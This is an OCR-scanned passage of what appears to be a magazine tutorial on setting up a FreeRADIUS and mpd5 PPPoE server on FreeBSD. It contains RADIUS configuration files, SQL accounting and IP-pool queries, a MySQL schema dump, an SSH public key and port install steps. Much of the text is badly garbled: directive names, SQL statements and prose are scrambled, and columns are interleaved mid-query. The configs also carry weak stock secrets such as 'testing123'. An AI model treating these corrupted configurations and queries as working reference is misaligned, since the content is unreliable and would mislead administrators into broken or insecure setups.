gGeoupehieck vable = “radgnoupeneck” 
groupreply table = “radgroupreply” 
USeEGrECUP EADS == Tusencmeup™ 

read groups = yes 
deletestalesessions = yes 

sgltrace = no 

sqltracefile = S{logdir}/sqltrace.sql 


num sql socks = 30 





COnmecty tae himetrer ay adelay — sel 
Tr retane = i 
Max Tuer iss) = 91) 


Malsm valolee=) irae 


SINCLUDE sql/S${database}/dialup.conf 


A 


} 
#eof 


# vi /usr/local/etc/raddb/eap.conf 


eap { 
elas ciblibe ercley ejcle = nilels 
PAM eae Ome = 60 


ignore unknown eap types = no 
ElSeO, accounting Usetnane bug = mo 


max sessions = 4096 


md5 { 
} 


leap { 


Gime 
VEG IEe / (Oe ane! 


tls f 
Certdic = o{(contdinr}/certs 


Ca@in — o(cContain)/ certs 


private key password = whatever 


private key file = ${certdir}/server.pem 


certificate file = ${certdir}/server.pem 


CA file S{cadir}/ca.pem 


dh file S{certdir}/dh 


random file = ${certdir}/random 


CA path = ${cadir} 


cipher ise = DEE AUIA” 


Make ncer: Command —) “> (cenedin) /DOCrstrap 


cache { 
enable = no 


ieeenine 2 os inenmes 
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Max Sener les == 255 


verify { 
} 
} 
Eek. xf 
default eap type = mdo 
COPY ebequcSsrEerOneunne l= Te 
Use uLUnneledetep ly = ne 
VIPeUgleSserver — | Liner sbunme. 
} 
peap { 
detaultyeap yes — mecnapyZ 
COPY SrequcSc EEO runmel = sme 
Wists ElblolNelerel iecjolly = jake! 
VUEeUalesenvery—— inher shunnel 
} 
mschapv2 { 
} 
} 
#eof 


¢ Wa /uisv/ local/etce) raddb/ proxy. cont 


proxy server { 


detaule talveack = ne 


NnOMe Se viciuehocalings ty | 


type = auth 
pare Gis = WA Oe Oral 
pore = 1812 


secret = testing123 
neqUnuemMNessegeua VUNen ume al Om s— yes 
response window = 20 

zombie period = 40 

revive wi mecrvals == 170) 

Sra US me MCC = sibelblls Sc cis cis 
elec ei nvekwcllks — 310 

MUM Paniswers FO clavce=—3 

coa { 


Pepa. 


Il 
= 
) 


Mie 


mre = 5 


mrd = 30 


NOM se aver POO my calle ranhover { 
type = fail-over 


home server = localhost 


realm example.com { 


euta pool, = my Tauehljbauilover: 


realm LOCAL { 
} 


#eof 


? vaio Just, locall/ctc/ taddb/ policy. cont 


policy { 
IONS Cl rele) 4] 
if (EAP-Message) { 


reject 


} 
perm nvonlyseco | 


if ('EAP-Message) { 





if (!”S{outer.request:EAP-Message}”) { 


reject 


} 


deny «realms { 
if (User-Name =~ /@|\\/) { 


reject 


} 
com noumueseoncay 
update control { 
Response-Packet-Type := Do-Not-Respond 


handled 
} 


Cura Wilh ore Ze 
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update request { callingstationid = ‘’, username = ‘’, \ 
Chargeable-User-Identity:=’ \\000’ expiry time = NULL \ 
} WHERE expiry time <= NOW() - INTERVAL 1 SECOND \ 
} AND nasipaddress = ‘%{Nas-IP-Address}’” 
Clie pOstauirm 4 
if (HreeRadius-Proxied-lo == 127.0.0.1) { allocate-find = “SELECT framedipaddress FROM ${ippool table} \ 
if (outer.request:Chargeable-User-Identity) { WHERE pool name = ‘%{control:Pool-Name}’ \ 
update outer.reply { ORDER BY (username <> ‘%{User-Name}’), \ 
Chargeable-User- (caMeingstatvonitc i. Calling —statvon— Kayne) 
IdenGity7="c{mds.> (eonlig -culy has Key} .{User-Name) | expiry time \ 
} mene 
} FOR UPDATE” 
} 
else { pool-check = “SELECT id FROM ${ippool table} \ 
if (Chargeable-User-Identity) { WHERE pool name=’%{control:Pool-Name}’ LIMIT 1” 
update reply { 
Chargeable-User- allocate-update = “UPDATE ${ippool table} \ 
Identity="%s{md5:%{config:cui_ hash key}%s{User-Name} }” Bld ee lpaddress as oi Rone hddress |) pe0Cl Koya 
} ‘S{pool-key}’, \ 
} callingstationid = ‘%{Calling-Station-Id}’, username = 
} ‘${User-Name}’, \ 
} expiry time = NOW() + INTERVAL ${lease-duration} SECOND \ 
cuisupdareda { VWiht ei eamedipadedress = 821° (AND Vexpiry seine ie NUE 
if (reply:Chargeable-User-Identity) { 
eum start-update = “UPDATE ${ippool table} \ 
} SET €xpiry time = NOW() + INTERVAL 5{léase-duration} 
} SECOND \ 
Cinmceecounulngn| WHERE as tpaddress = -“o|NAS-1P-Adoress |? AND. pool Key 
if ('Chargeable-User-Identity) { = ‘S{pool-key}’ \ 
update control { AND username = ‘%{User-Name}’ \ 
Chargable-User-Identity := “%{cui: SELECT AND callingstationid = ‘%{Calling-Station-Id}’ \ 
Cui FROM cui WHERE clientipaddress = ‘%{Client-IP- AND framedipaddress = ‘%{Framed-IP-Address}/” 
Addwess|”’ ANDecallingstatronig = ~<{Calling—stacivon= 
Id}’ AND username = ‘%{User-Name}’ }” stop-clear = “UPDATE ${ippool table} \ 
} Sl aStpaddbess — = 7. ocol key = 0 callings tatlonree= 
} username = “’; \ 
if (Chargeable-User-Identity && (Chargeable-User- expiry time = NULL \ 
Identity !'= “”)) { WHERE tes pacdeessus «5 Nes iP Addness | ali pool key = 
jeune 1oool Ke 7 
} AND username = ‘%{User-Name}’ \ 
} ANDMecalikingstatronic =) 1 Calsking— cotati on. hcp.) 
} AND framedipaddress = ‘%s{Framed-IP-Address}’'” 
#eo0f alive-update = “UPDATE ${ippool table} \ 
onl expiry time = NOW() + INTERVAL > {lease-duracion} 
i Vl /Usr/ llogaly etc, radd5/ sql mysql) 1ppeell. cont SECOND \ 
NER ide eadedpess.— olde bP andemess| > AND eeclmke ys = 
allocate-clear = “UPDATE ${ippool table} \ ‘S{pool-key}’ \ 
SET nasipaddress = ‘’, pool key = 0, \ AND username = ‘%{User-Name}’ \ 
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AND callingstationid = ‘%{Calling-Station-Id}’ \ 
AND framedipaddress = ‘%{Framed-IP-Address}/” 


On=cléar = UPDATE >| ppooly table; 
DOP eiasitepacemesse —— ay OOO mete yl, ed EGS al onmlan— 
username = ; \ 
expiry time = NULL \ 
WHERE nasipaddress = ‘%{Nas-IP-Address}’'” 


@bi-clea —  UEBDAIE = tippoc lh table} 
DE enastpadt reser —s | yarCOO le Ney = Up cauliigetaElonran— 
username = **, \ 
expiry time = NULL \ 
WHERE nasipaddress = ‘%{Nas-IP-Address}’” 


#eof 
# vi /usr/local/etc/raddb/sql/mysgl/dialup.conf 


sql user name = “<{User—-Name}” 


Naseer ——  SHECI 1d, Stasiane, —shostname, sbype, 


SCC oe ee Olle Wocmiraere, | 


BUENOEIZe check ecilen y=) Sale held WschnaMe, abuGi— 
bute, value, op \ 

HROME euLnenec ral lop 

WHERE username = ‘%{SQL-User-Name}’ \ 

ORDERS Bi rac. 
CUNO nU Zen GeO hy Sele nye——) sniGtC GC aisckiaie; astm ie 
bute, value, op \ 

HROMe (2uenEeply veable} =) 

WHERE username = ‘%{SQL-User-Name}’ AND attri- 
bute <> ‘Garantia’ \ 


ORDER BY id” 


group membership query = “SELECT trim(groupname) as 
groupname \ 

BROMP (Usergroup. cable; 

WHERE username = ‘%{SQL-User-Name}’ \ 

ORDER OB Dior try 


EUIEN Om’ Ze NG TOUpmeNeeCKuqueny. = St inC ld, 
trim(groupname) as groupname, attribute, \ 
Value, op \ 
FROM ${groupcheck table} \ 
WHERE trim(groupname) = trim(‘%{Sgl-Group}’) \ 
ORDER a5 ane 
euUNOnE Zeng cOUpEEce  yuquemy =) sma i rd, 
trim(groupname) as groupname, attribute, \ 


value, op \ 


FROM ${groupreply table} \ 
WHERE trim(groupname) = trim(‘s{Sql—-Group}’ ) 
BiG bwlolvem <M yeloeme cee a. 


ORDER BY 1d” 


accounting onoff query = “\ 


UPDATE ${acct tablel} \ 


Ser \ 
acctstoptime = “357.\ 
EgeCuSessLONEame = Ui eS cmes Temenos) 


a 
unix _ 


timestamp(acctstarttime), \ 


acctterminatecause ‘${Acct-Terminate- 


Cause}’, \ 


acctstopdelay = %{%{Acct-Delay- 
Time}:-0O} \ 
WHERE acctstoptime IS NULL \ 
AND nasipaddress = ‘%S{NAS-IP-Address}’ \ 
AND acctstarttime <= ‘SS'" 


accounting update query = “ \ 
URDAUEE (cee rp ecole li, 
Sbu 
framedipaddress = ‘%{Framed-IP-Address}’, \ 


acctsessiontime = ‘%{Acct-Session-Time}’, \ 
acctinputoctets = ‘${%{Acct-Input-Giga- 


woraosts-O0b" << 32 1/1) \ 
Tro pene © a emp Uae = 
Octers tia 
acctoutputoctets = ‘%${%{Acct-Output- 
Gigawords}d=0)" =<<<32 (|) \ 
yo po RCCL -OUL DUES 
Octets!:-01" 


WHERE acctsessionid = ‘%{Acct-Session-Id}’ \ 


AND username = ‘S${SQL-User-Name}’ \ 
AND nasipaddress = ‘%{NAS-IP-Address}/” 


sr 


accounting update query alt 
INSERT INTO $f{acct tablel} \ 


(acctsessionid, acctuniqueid, username, \ 
realm, nasipaddress, nasportid, \ 
nasporttype, acctstarttime, acctsessiontime, \ 
acctauthentic, connectinfo start, acctinputoctets, \ 


acctoutputoctets, calledstationid, callingstationid, \ 


servicetype, framedprotocol, framedipaddress, \ 
aeCuestarecelay, xascendsessionsvrkey) \ 
VALUES \ 


( s{ACCE—session—-ld) 7) “siAccr-Uniguie-ses— 
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CaO = VGiia aan oe ves NO a sh 
‘3{SOL-User-Name}’, \ roproablled=station-la)-. “o{ calling -suaclon— 
‘S${Realm}’, ‘%S{NAS-IP-Address}’, ‘%{NAS- ra 

DOs te ie ey *o 1 DeCrvice-Type}’ ;, “c1Pramed-Protocol |” , 
VINES = Pome yore ‘3{Framed-IP-Address}’, \ 

DALE SUBK ss \ ao oe Cle = Dea ime fee Os 
INTERVAL (%{%{Acct-Session- ‘S{X-Ascend-Session-Svr-Key}’)” 
Time}:-O} + \ 
6{%{Acct-Delay- ACCC MONcLinG Sees Cfieiey allie = | 
Lame =O) eos coh. UPDATE S{acct tablely ssht ‘ 
‘3{Acct-Session-Time}’, \ acctstarttime eC aN 
‘3{Acct-Authentic}’, *’, \ acctstartdelay = ‘%{%{Acct-Delay- 
Pee CCE Input G loewo mds \2—0))\ <9 57 a \ Time}:-0}', \ 
Roe AeCr—Iinput—Octets Ua connectinfo start = ‘%{Connect-Info}’ \ 
Poe (CCE OU Mp UE Giclanonacla es 0)s <7 alle WHERE acctsessionid = ‘%{Acct-Session-Id}’ \ 
oe UNCC ES OU eulie OC ESitS | S01 — AND username = ‘%{SQL-User-Name}’ \ 
VoCalledSsrabron— ld) ju). Oa Mimic sre AND nasipaddress = ‘%{NAS-IP-Address}’” 

PROM Mole \ 

Veoer yee lvype) 7... c\Hramed—-Prorocell}) a \ ACeCOUMPEING NS POO query — ) \ 

‘3{Framed-IP-Address}’, \ UPDATE ${acct table2} SET \ 

Oy °o ( haksCend=secsilon-svrokey)")™ acctstoptime = ‘SS’, \ 
acctsessiontime = ‘${Acct-Ses- 

accounting start query = “ \ SoO iis Mies) a 

INSERT INTO ${acct tablel} \ acctinputoctets = ‘${%{Acct-Input-Giga- 
(acctsessionid, acctuniqueid, WO OS = Ua cae” alle 

username, \ Seether aput= 

realm, nasipaddress, Oewers ls Uren 

Mac poct uc acctoutputoctets = ‘%${%{Acct-Output-Giga- 
nasporttype, acctstarttime, WO CCG tet 0ig a eo nN 

acctstoptime, \ ‘${%{Acct-Output- 
acctsessiontime, acctauthentic, Con Octets|!:-01" 7 * 

Me GOs eciae ee. Ce Verna oCalliser ==) 6] NCCU al omit iaue = 
ECities Imm Oms LOO, acer MoOuLCebete, Catise ae <\ 

accroutputoctets, “| acctstopdelay = ‘${*{Acct-Delay- 
Cobleds ramones ea linincsret lon; acer = Time}:-0}', \ 

terminatecause, \ connectinfo stop = *‘%{Connect-Info}’ \ 
servicetype, framedprotocol, frame- WHERE acctsessionid = ‘${Acct-Session-Id}’ \ 

dipaddress, \ AND username = ‘%{SQL-User-Name}’ \ 
acctstartdelay, acctstopdelay, xas= AND nasipaddress = ‘S{NAS-IP-Address}/” 

cendsessionsvrkey) \ 
VALUES \ SCO UIE LNG sO culemy ele 2 | 
(Pe eeia seco MOM Weer cee ties INSERT INTO ${acct table2} \ 

Session-Id}’, \ (acctsessionid, acctuniqueid, username, \ 
‘${SQL-User-Name}’, \ realm, nasipaddress, nasportid, \ 
‘S${Realm}’, ‘s{NAS-IP-Address}’, ‘s{NAS- nasporttype, acctstarttime, acctstoptime, \ 

Pomey s. 3\ acctsessiontime, acctauthentic, con- 
‘“S{NAS-Port-Type}’, “2S’, NULL, \ Hechinrorcbart, a. 

*0 > “2s ACCe-Auinnentic} 4 * 2 Connecr— GCONne Cl IMEOTSstOp,, AcCeuIMpILLOCECES, -accrour— 
oneen eee PULOCEC ES, -\ 
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calledstatienid, ca blingstetvonid, sacctter= 
Minatecause, \ 
servicetype, framedprotocol, framedi- 


paddress,. -\ 
acctstartdelay, acctstopdelay) \ 
VALUES \ 
(“S(AGCCE-Ssessvon-idt nw “s(AccL-Unique-—Ses= 
Sion la} as. 


\ 


o\e 


{SQL-User-Name}’, \ 


‘S{Realm}’, ‘s{NAS-IP-Address}’, ‘S{NAS- 
Port}, «\ 
SNAG -POKE-lyoe)” ja.\ 


DATE SUB(*3S’, \ 


INTERVAL, (2{2{ACcu-oessiton—lime}<s—0} 
\ 
Sto ACct Delay — ime: 0} shCOND ys \ 
Poo oO UNeCCu-OoeCSSl Onl Ime), = ol heer. 


AUchieniiG i. “oy \ 


‘3{Connect-Info}’, \ 


\ 


ale 


{ 

(eo Acct—Iinput—Grgawords }:—0} 7 << 3257 \ 
( Acet. Mnput— OC€Srs = — 0 ena. 
{o{ } 
{ 


\ 


ale 


\ 


ale 


%{Acct-Output-Gigawords}:-0}"’ << 32 | \ 
‘3 {S{Acct-Output-Octets}:-0}’, \ 
NiCalled=Statilon—iea\ a's Calling=cta— 

tion-Id}’, \ 

‘3 {Acct-Terminate-Cause}’, \ 
‘${Service-Type}’, 

‘${Framed-IP-Address}’, \ 

‘or, 


21 baned-EroLrocol) | 


‘3{%{Acct-Delay-Time}:-0}')” 


Sim coun quccy —  SHLcel COUNN (=) 9) 

HEOMM cee male li. 

WHERE username = ‘%{SQL- 
User-Name}’ \ 

AND acctstoptime IS NULL” 
acctsessio- 


Samui verity eteny a9 =) Solel wadaccuid, 


iid, vserneame,, \ 
naSipaddress, nasportid, 

framedipaddress, \ 

callingstationid, framed- 
ProLocol |\ 

I NOM Sse ictoleies ectelbeil) s\ 

WHERE username = ‘%{SQL- 
User-Name}’ \ 


AND acctstoptime IS NULL” 


PCStauumequery = “INERT INTO S| PpocraulLaetable)= \ 


(username, pass, reply, 


authdate) \ 
VALUES ( \ 
‘${User-Name}’, \ 
‘3{%{User-Password} :-%{Chap- 
Password y\ .)\ 


wo bep ly: Packet lypel 44 “oo ) 7 


#eof 


# /usr/local/etc/raddb/sites-enabled/control-socket 
listen { 
type = control 


socket = S${run dir}/S${name}.sock 


#eof 


+ / ust, local) eucy racddh/Ssitues—enabled/ immer—rcunned: 


server inner-tunnel { 


listen { 
ipaddr = 0127 20.0 1 
port = 18120 
type = auth 
} 
authorize f{ 
chap 
mschap 
suffix 
update control { 
Proxy-To-Realm := LOCAL 
} 
eap { 
ok = return 
} 
files 
expiration 
logintime 


Pap 


authenticate { 


Auth-Type PAP { 
Pap 


Auth-Type CHAP { 
chap 
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Auth-Type MS-CHAP { 


mschap 


ina 


eap 


session { 


radutmp 

} 

Ge b= clueiue 
Post-Auth-Type REJECT { 

Elbe WULcSie eC CSES 1S See 

} 

} 

pre-proxy { 

} 


Or Epi @rx/ a 


eap 
} 

} 

#eof 


# /usr/local/etc/raddb/sites-enabled/default 
authorize { 

preprocess 

chap 

mschap 

Souk 

expiration 

logintime 


pap 


authenticate { 


Auth-Type PAP { 
Pap 


Auth-Type CHAP { 
chap 


Auth-Type MS-CHAP { 


mschap 


digest 


preacct { 
OLS OLOCESE 
ce ta Umenciue 
suffix 


files 


ele COMM a 
dear! 
See 
exec 
UEC aceon e mig ese svonse 


Sqilipeoo! 


session { 


Sql 
} 
POs cline, 
exec 
POSt=Aurh=Type REJECT { 
cue aber aecescmaci cee 
} 
sqluippoo! 
} 
pre-proxy { 
} 


POs ror Oxn ya 


eap 


#eof 
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Listing 9. 


# cat radius nodata.sql 


/*'40101 SET @OLD CHARACTER SET CLIENT=@@CHARACTER SET_ 
CLIENT */; 


/*'40101 SET @OLD CHARACTER SET RESULTS=@@CHARACTER SET_ 


RESULTS */; 

/*'40101 SET @OLD COLLATION CONNECTION=@@COLLATION CON- 
NECTION */; 

/*140101 SET NAMES utf8 */; 

/*'40103 SET @OLD TIME ZONE=@@TIME ZONE */; 

/*140103 SET TIME ZONE='+00:00' */; 


/*'40014 SET @OLD UNIQUE CHECKS=@@UNIQUE CHECKS, UNIQUE _ 


CHECKS=0 */; 

/*'40014 SET @OLD FOREIGN KEY CHECKS=@@FOREIGN KEY_ 
CHECKS, FOREIGN KEY CHECKS=0 */; 

/*'40101 SET @OLD SQL MODE=@@SQL MODE, SQL MODE=’NO_ 
AUTO VALUE ON ZERO’ */; 


/*140111 SET @OLD SQL NOTES=@@SQL NOTES, SQL NOTES=0 */; 


-- Table structure for table nas” 


DROP TABLE IF EXISTS ‘nas’; 
/*140101 SET @saved_ cs client 


@@character set_ 
client .*/ ; 

/*140101 SET character set client = utf8 */; 

CREATE TABLE “nas ( 
“ta ine (10) NOE NUE AUTO INCREMENT, 
“nasname” varchar(128) NOT NULL, 
*shortname” varchar(32) DEFAULT NULL, 
“type varchar(30) DEFAULT ‘other’, 
“peOrts “int (>) DEFAULT NULL, 
“secret varchar(60) NOT NULL DEFAULT ‘secret’, 
“community varchar(50) DEFAULT NULL, 
“description varchar (200) “DEFAULT “RADIUS Clienu’ , 
PRIMARY KEY (‘id*), 





KEY “nasname’ (> nasname°) 


) ENGINE=InnoDB DEFAULT CHARSET=latinl; 


/*!40101 SET character set client = @saved_cs client */; 


=- Table structure for table radacct 


DROP TABLE DF EXISTS  radacct > 
/*!40101 SET @saved_cs_ client 


elaveianw 2/5 


= @@character set_ 


/*!40101 SET character set client = utf8 */; 

CREATE TABE tadacce { 
“RadAcctId° bigint(21) NOT NULL AUTO INCREMENT, 
“AcctSessionid varchar(32) NOT NULL DEFAULT °‘’, 
“AcctUniqueld varchar(32) NOT NULL DEFAULT ‘’, 
“UserName” varchar(64) NOT NULL DEFAULT °‘’, 
“Realm varchar(64) DEFAULT °’, 
“NASIPAddress’ varchar(15) NOT NULL DEFAULT °‘’, 
“NASPortId° varchar(15) DEFAULT NULL, 
“NASPortType’ varchar(32) DEFAULT NULL, 
“AcctStartTime datetime NOT NULL DEFAULT ‘0000-00-00 

OOOO 092: 

“acctstoptime datetime DEFAULT NULL, 
“AcctSessionTime’ int(12) DEFAULT NULL, 
“AcctAuthentic’ varchar(32) DEFAULT NULL, 
"COMNeCEIMGOustare Svacchar(o0) DE EAU nl sNU in, 
(COunecEIMEORSrOp varchar ( 50) DEEAULT  NUIGE, 
“AcctInputOctets> bigint(12) DEFAULT NULL, 
ACCEOULOUEOCrers “bigimnu(17Z) DEFAULT NUL, 
*“CalledStationId* varchar(50) NOT NULL DEFAULT °’, 
CallingStationid varehar(50) NOT NULL DEPAULT ~"; 
“AcctTerminateCause varchar(32) NOT NULL DEFAULT °‘’, 
*ServiceType’ varchar(32) DEFAULT NULL, 
*FramedProtocol’ varchar(32) DEFAULT NULL, 
*FramedIPAddress” varchar(15) NOT NULL DEFAULT °‘’, 
“AcctStartDelay> int(12) DEFAULT NULL, 
“AcctStopDelay’ int(12) DEFAULT NULL, 
*xascendsessionsvrkey varchar(10) DEFAULT NULL, 
PRIMARY KEY ( RadAcctId°), 
KEY “UserName” (°UserName~), 
KEY ~“FramedIPAddress’ (°FramedIPAddress°), 
KEY “AcctSessionId (°AcctSessionId°), 
KEY “AcctUniqueId* (*AcctUniquelId°*), 
KEY “AcctStartTime ( AcctStartTime’), 
Kby ACecEStoplime “{ acetstoprime )| 
KEY “NASIPAddress” (> NASIPAddress_~ ) 

) ENGINE=InnoDB AUTO INCREMENT=22301255 DEFAULT 

CHARSET=latinl; 


/*'140101 SET character set client = @saved_cs client */; 


== Table structure for table radcheck 


DROP TABLE IF EXISTS ‘“radcheck’; 
/*140101 SET @saved_cs client 


@@character set_ 
client */; 

/*'40101 SET character set client = utf8 */; 

CREATE TABLE “radcheck” ( 
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Sid) ime (lh) uns rqnedsNOe INUInIE AUTO INCREMENT, 
“UserName* varchar(64) NOT NULL DEFAULT ‘’, 
“Attribute  varchar(32) NOT NULL DEFAULT ‘’, 
‘op’ char(2) NOT NULL DEFAULT ‘==', 
*Value* varchar(253) NOT NULL DEFAULT ‘’, 
‘Bloqueado* tinyint(1) NOT NULL DEFAULT ‘0’, 
PRIMARY KEY (‘id*), 
KEY “UserName (°UserName~ (32)) 

) ENGINE=MyISAM AUTO INCREMENT=20876 DEFAULT 

CHARSET=latinl; 


/*!40101 SET character set client = @saved_cs client */; 


== Vabletstructure for table “radqroupeneck 


DROP TABLE IF EXISTS ‘“radgroupcheck’; 
/*140101 SET @saved_ cs client = @@character set_ 
elena ~/. 
/*'40101 SET character set client = utf8 */; 
CREATE TABLE “radgroupcheck ( 
"td ine (1) unsigned NOT NULL AUTO INCREMENT, 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, 
“Attribute  varchar(32) NOT NULL DEFAULT *‘’, 
“op char(2) NOT NULL DEFAULT “=="_ 
*Value* varchar(253) NOT NULL DEFAULT °’, 
PRIMARY KEY (‘id*), 
KEY “GroupName” (°GroupName~ (32)) 
) ENGINE=MyISAM AUTO INCREMENT=250 DEFAULT 
CHARSET=latinl; 


/*!140101 SET character set client = @saved_cs client */; 


== lable structure for table radqroupreply 


DROP TABLE IF EXISTS ‘radgroupreply’; 
/*140101 SET @saved_ cs client — ec iicimeeucmnccum 
cliente </> 

/*140101 SET character set client = utf8 */; 

CREATE TABLE “radgroupreply ( 
id ane (eins rgned Now Niu: AUTO INCREMENT, 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, 
“Attribute varchar(32) NOT NULL DEFAULT ‘’, 
‘op’ char(2) NOT NULL DEFAULT ‘=’, 
*Value* varchar(253) NOT NULL DEFAULT °‘’, 
PRIMARY KEY (‘id*), 
KEY ~GroupName” (°GroupName~ (32) ) 

) ENGINE=MyISAM AUTO INCREMENT=492 DEFAULT 





CHARSET=latinl; 


/*!40101 SET character set client = @saved_cs client */; 


Silo me ehNe vice stor acolo sccunooooln 


DROP TABLE LP EXISTS “Lacippool | 
/*140101 SET @saved_cs_ client 
client /e 


/*!40101 SET character set client = utf8 */; 


@@character set_ 


CREATE TABLE “radippool’ ( 
“td ame (ll) uns1gned NOG NULL AUTO INCREMENT, 
‘pool name” varchar(30) NOT NULL, 
*framedipaddress* varchar(15) NOT NULL DEFAULT ‘’, 
“nasipaddress’ varchar(15) NOT NULL DEFAULT °‘’, 
“calledstationid® varchar(30) NOT NULL, 
“callingstationid® varchar(60) DEFAULT NULL, 
eC 4OanE eis lee emcee aU inl aN Onin 
“username” varchar(64) NOT NULL DEFAULT °‘’, 
‘pool key” varchar(30) NOT NULL, 
PRIMARY KEY (id), 
KEY) ech peoole pool name sexpire S( Ppoolmmame | Cxpiry® 
time’), 
KEY ~“framedipaddress’ (°framedipaddress~), 
ENS aeelcul pe OC eleMiclo Ome Oelnnc ye pccdeiccc. 
(“nasipaddress’, pool key’, framedipaddress ) 
) ENGINE=InnoDB AUTO INCREMENT=994 DEFAULT 
CHARSET=latinl; 


/*'140101 SET character set client = @saved_cs client */; 


== Table structure for table vradpostauth 


DROP TABLE LP EXISTS ~radpostauth ’; 
/*'40101 SET @saved_ cs client 


elena ety 


@@character set_ 


iteeooes 


/*'40101 SET character set client 
CREATE TABLE “radpostauth ( 
“ta int (11) NOr NULE AUTO INCREMENT, 
“user varchar(64) NOT NULL DEFAULT ‘’, 
‘pass’ varchar(64) NOT NULL DEFAULT °‘’, 
‘ceply varchar (32) NOT NUL PEEAUIR ~’ | 
“date” timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON 
UPDATE CURRENT SIME S LAME, 
PRIMARY KEY (*id*) 
) ENGINE=MyISAM AU LOMINGEEMENT=56 73695 DarAUEE 
CHARSE T= latand; 
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/*!40101 SET character set client = @saved_cs client */; 


=~ ave SeructibertOr  beaviles madneol 


DROP TABLE IF EXIsts radreply ; 
/*140101 SET @saved_cs_ client 
client */; 
/*140101 SET character set client = utf8 */; 
CREATE TABLE ‘radreply” ( 
“id* int(11) unsigned NOT NULL AUTO INCREMENT, 


@@character set_ 


“UserName” varchar(64) NOT NULL DEFAULT °‘’, 
“Attribute” varchar(32) NOT NULL DEFAULT °‘’, 
“op “char(2) NOT NULL, DEFAULT “=", 
‘Value’ varchar(253) NOT NULL DEFAULT *’, 
PRIMARY KEY (‘id*), 
KEY “UserName” (° UserName” (32) ) 

) ENGINE=MyISAM AUTO INCREMENT=27136 DEFAULT 

CHARSET=latinl; 


/*'140101 SET character set client = @saved_cs client */; 


—— ables SerRucwiGe fOr tole. Usendvoup. 


DROP TABLE I? ExXilets usergroup ; 

/*!40101 SET @saved_cs client 
client */; 

/*140101 SET character set client = utf8 */; 

CREATE TABLE “usergroup ( 


@@character set_ 


“UserName” varchar(64) NOT NULL DEFAULT °’, 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, 
(elon one () NOr NUR DE EAU ie 
KEY “UserName” (° UserName’ (32) ) 

) ENGINE=MyISAM DEFAULT CHARSET=latinl; 


/*!40101 SET character set client = @saved_cs client */; 


== Table structure for table velocidades 


Listing 10. 


ii COC) ween euuNoriaednKey = 


DINO! IWNSILIS, IE ISIS  welloeuckicles) ¢ 
/*!40101 SET @saved_cs client 
client */; 

/*'40101 SET character set client = utf8 */; 
CREATE TABLE ‘velocidades” ( 

ech eee (yOu umn 

“ydown int(11) NOT NULL, 

‘vup*> int(11) NOT NULL, 

PRIMARY KEY (*id*) 
) ENGINE=InnoDB DEFAULT CHARSET=latinl; 


@@character set_ 


/*!140101 SET character set client = @saved_cs client */; 


/*140103 SET TIME ZONE=@OLD TIME ZONE */; 


/*'40101 SET SQL MODE=@OLD SQL MODE */; 

/*'40014 SET FOREIGN KEY CHECKS=@OLD FOREIGN KEY CHECKS 
*/; 

/*'40014 SET UNIQUE CHECKS=@OLD UNIQUE CHECKS */; 

/*'40101 SET CHARACTER SET CLIENT=@OLD CHARACTER SET_ 
CLIENT */; 

/*'40101 SET CHARACTER SET RESULTS=@OLD CHARACTER SET_ 
Rio Ul e 7, 

/*'40101 SET COLLATION CONNECTION=@OLD COLLATION CONNEC- 
TLCNeS/ 

/*'40111 SET SQL NOTES=@OLD SQL NOTES */; 


-- Dump completed on 2014-10-20 22:54:08 


ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQDPVC3ksxLRuHPcknfskNhxXxxhtrgfq40904T/wJsrPlETgMmjg3kbHDbszeAio/y7au2rORRWSadmQ 
R517dQhBI0qdWF5Zp+SbBfebik7 rmJeoTCpESQySH9KM/nBsDx914+UiDogkOziQJtkI IRoux8nZgLc5JdJkzcj £00MS7pQ4LzISmDCDJQ75VsG00QZ 
a0du40lvngj]x8fMvk182rCkhYaMUhbhR1injBvhNSWn fOY51FpOocbiOSMGym4pHOEJNWHQHLtVKY+1D5peA03UM1il7rz1lZkQWLFCaAvJlaEXlasw3 
ylW7/AzvCVas 6uKyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br 
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Insert examples of functional client: These entries con- 
trol concurrent access, user and password (Listing 11). 

lf using pap, use the Password attribute and if you use 
chap, use ClearText-Password attribute. 

Here we address the control pool of dynamic IPs, the 
warranty, the address that will be delivered v4 and v6 ad- 
dress prefix. We note that if we have the Framed-IP-Ad- 
dress, it will be prioritized and this field will not exist; the 
addressing will be done through the pool of IPs (Listing 12). 

Here we register the customer's plans: Listing 13. 

Here we will make the link between the user and the 
contracted plan: Listing 14. 

The registration address of our pool of IPs can be public 
or private: Listing 15. Now start the services and we have 
a server ready to use! 

Let's start authenticating clients! =D 

Now we will do the PPPoE concentrator. 

On a machine with newly installed Freebsd, we will not 
cover the installation in question. It is a generic installa- 
tion, but leave a space in /var for logs. 

Edit rc.conf with some settings and startup daemons 
(Listing 16). 

A tip: if you are experiencing a very high CPU consump- 
tion and instability, disable tso, Iro, hwcsum and txcsum. 
Not much impact on performance and quality, but consid- 
erably reduces the processing (Listing 17). 

We will install the necessary packages: 

Install mpd5 on your freebsd: 


€ 


Multi-link PPP Daemon for FreeBSD 


Current status summary 


# cd /usr/ports/net/mpd5 


# make install clean 
Install freeradius-client: 


# cd /usr/ports/net/freeradius-client 


# make install clean 
Install bind: 


# cd /usr/ports/dns/bind910 


# make install clean 
Install mysq] client: 


# cd /usr/ports/databases/mysql56-client 


# make install clean 
Install postfix: 


# cd /usr/ports/mail/postfix 


# make install clean 
Install nginx: 


# cd /usr/ports/www/nginx 


# make install clean 


common [nite pppoe DOWN 
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Listing 11. 


mysql> use radius 
Database changed 


mysql> select * from radcheck where username=’ testuser’ ; 


+------- +------------- $------------------ +----+----------- +----------- + 
[ad | UserName | Attribute | op | Value | Bloqueado | 
+------- +------------- $------------------ +----+----------- +----------- + 
| £034" | EESTUSER | Password | == | testpass | 0 | 
[2Osa> ee SstUSEE | Samultaneous-use | = | 1 | 0 | 
+------- +------------- $------------------ +----+----------- +----------- + 


3 rows in set (0.00 sec) 


Listing 12. 


mysql> select * from radreply where username=’ testuser’ ; 


+------- +------------- $-------------------- +----+------------------------- + 
| id | UserName | Actix bute | op | Value | 
+------- +------------- $-------------------- +----+------------------------- + 
| 266 |) ES USER | Pool-Name | := | main pool | 
lineout [PSE S BUSH | Garantia | == | 20 | 
line 70 eS RU SEs | Framed-IP-Address | == | 203.0.113.69 | 
